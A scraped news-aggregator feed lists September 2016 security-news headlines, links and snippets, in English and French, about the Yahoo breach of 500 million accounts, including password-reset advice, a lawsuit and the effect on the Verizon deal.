https://www.grahamcluley.com/yahoo-email-address-hack/ www.secnews.physaphae.fr/article.php?IdArticle=128108 False None Yahoo None SecurityWeek - Security News 2016-09-26T11:13:13+00:00 http://feedproxy.google.com/~r/Securityweek/~3/0Qg88PG3k-4/uk-man-involved-2012-yahoo-hack-sentenced-prison www.secnews.physaphae.fr/article.php?IdArticle=127603 False None Yahoo None ComputerWeekly - Computer Magazine 2016-09-26T10:30:26+00:00 http://www.computerweekly.com/news/450304977/Yahoo-sued-over-data-breach www.secnews.physaphae.fr/article.php?IdArticle=128573 False None Yahoo None Dark Reading - Informationweek Branch 2016-09-26T10:25:00+00:00 http://www.darkreading.com/attacks-breaches/yahoo-breach-could-delay-$48-billion-verizon-takeover/d/d-id/1327004?_mc=RSS_DR_EDT www.secnews.physaphae.fr/article.php?IdArticle=128367 False None Yahoo None ComputerWeekly - Computer Magazine 2016-09-26T05:45:32+00:00 http://www.computerweekly.com/news/450304953/Yahoo-security-still-poor-despite-massive-breach-claims-Venafi www.secnews.physaphae.fr/article.php?IdArticle=128574 False None Yahoo None CSO - CSO Daily Dashboard To read this article in full or to leave a comment, please click here]]> 2016-09-26T03:00:00+00:00 http://www.csoonline.com/article/3123496/security/yahoo-s-compromised-records-likely-hidden-within-encrypted-traffic-vendor-says.html#tk.rss_all www.secnews.physaphae.fr/article.php?IdArticle=127215 False None Yahoo None SecurityWeek - Security News 2016-09-24T23:14:41+00:00 http://feedproxy.google.com/~r/Securityweek/~3/DGHE4YKLZ9I/russia-china-who-hacked-yahoo-and-why www.secnews.physaphae.fr/article.php?IdArticle=121837 False None Yahoo None Kaspersky Threatpost - Kaspersky est un éditeur antivirus russe 2016-09-23T16:59:15+00:00 https://threatpost.com/threatpost-news-wrap-september-23-2016/120833/ www.secnews.physaphae.fr/article.php?IdArticle=116969 False None Yahoo None SecurityWeek - Security News Link:  Yahoo! Pressed to Explain Massive 'State Sponsored' Hack Yahoo! Pressed to Explain Massive 'State Sponsored' Hack ]]> 2016-09-23T13:10:30+00:00 http://feedproxy.google.com/~r/Securityweek/~3/3VOksSMyQSA/yahoo-pressed-explain-massive-state-sponsored-hack www.secnews.physaphae.fr/article.php?IdArticle=116372 False None Yahoo None SecurityWeek - Security News Yahoo faced pressure Friday to explain how it sustained a massive cyber-attack -- one of the biggest ever, and allegedly state-sponsored -- allowing hackers to steal data from half a billion users two years ago. ]]> 2016-09-23T12:14:35+00:00 http://feedproxy.google.com/~r/Securityweek/~3/u-Ct-lMcwzs/yahoo-pressed-explain-huge-state-sponsored-hack www.secnews.physaphae.fr/article.php?IdArticle=116095 False None Yahoo None We Live Security - Editeur Logiciel Antivirus ESET 2016-09-23T10:44:28+00:00 http://feedproxy.google.com/~r/eset/blog/~3/9IeejdW3VVg/ www.secnews.physaphae.fr/article.php?IdArticle=115804 False None Yahoo None Graham Cluley - Blog Security Do you have a Sky email account? There's potentially bad news - that service comes courtesy of Yahoo. ]]> 2016-09-23T10:43:06+00:00 https://www.grahamcluley.com/2016/09/sky-customers-told-change-passwords-massive-yahoo-hack/ www.secnews.physaphae.fr/article.php?IdArticle=115662 False None Yahoo None Graham Cluley - Blog Security With at least 500 million Yahoo users exposed by the 2014 hack, other services are also advising customers to reset their passwords. ]]> 2016-09-23T10:30:56+00:00 https://www.grahamcluley.com/2016/09/investigates-yahoo-hack-tells-yahoo-mail-users-reset-passwords/ www.secnews.physaphae.fr/article.php?IdArticle=115663 False None Yahoo None Network World - Magazine Info have stolen the details of at least 500 million accounts shocks both through scale -- it's the largest data breach ever -- and the potential security implications for users.That's because Yahoo, unlike MySpace, LinkedIn and other online services that suffered large breaches in recent years, is an email provider; and email accounts are central to users' online lives. Not only are email addresses used for private communications, but they serve as recovery points and log-in credentials for accounts on many other websites.To read this article in full or to leave a comment, please click here]]> 2016-09-23T10:26:25+00:00 http://www.networkworld.com/article/3123394/heres-what-you-should-know-and-do-about-the-yahoo-breach.html#tk.rss_security www.secnews.physaphae.fr/article.php?IdArticle=117062 False None Yahoo None Naked Security - Blog sophos ]]> 2016-09-23T08:43:11+00:00 https://nakedsecurity.sophos.com/2016/09/23/change-your-password-yahoo-confirms-data-breach-of-500-million-accounts/ www.secnews.physaphae.fr/article.php?IdArticle=115268 False None Yahoo None @Renseignator - Flux Twitter 2016-09-23T08:01:13+00:00 https://twitter.com/renseignor/status/779198918798213122 www.secnews.physaphae.fr/article.php?IdArticle=114875 False None Yahoo None UnderNews - Site de news "pirate" francais Voila qui représente l'une des plus importantes brèche ayant touché une entreprise américaine. Yahoo vient en effet de confirmer ce jeudi soir avoir été victime d'une cyberattaque fin 2014 ayant compromis 500 millions de comptes utilisateurs.]]> 2016-09-23T07:00:45+00:00 http://feedproxy.google.com/~r/undernews/oCmA/~3/7IZCs6Wz84A/yahoo-confirme-le-piratage-de-500-millions-de-comptes-utilisateurs.html www.secnews.physaphae.fr/article.php?IdArticle=115004 False None Yahoo None ComputerWeekly - Computer Magazine 2016-09-23T05:45:25+00:00 http://www.computerweekly.com/news/450304842/Yahoo-under-fire-over-data-breach-affecting-500-million-users www.secnews.physaphae.fr/article.php?IdArticle=115642 False None Yahoo 4.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) ]]> 2016-09-22T23:46:49+00:00 http://feedproxy.google.com/~r/TheHackersNews/~3/6OKvX3LEjD0/yahoo-data-breach.html www.secnews.physaphae.fr/article.php?IdArticle=114897 False None Yahoo None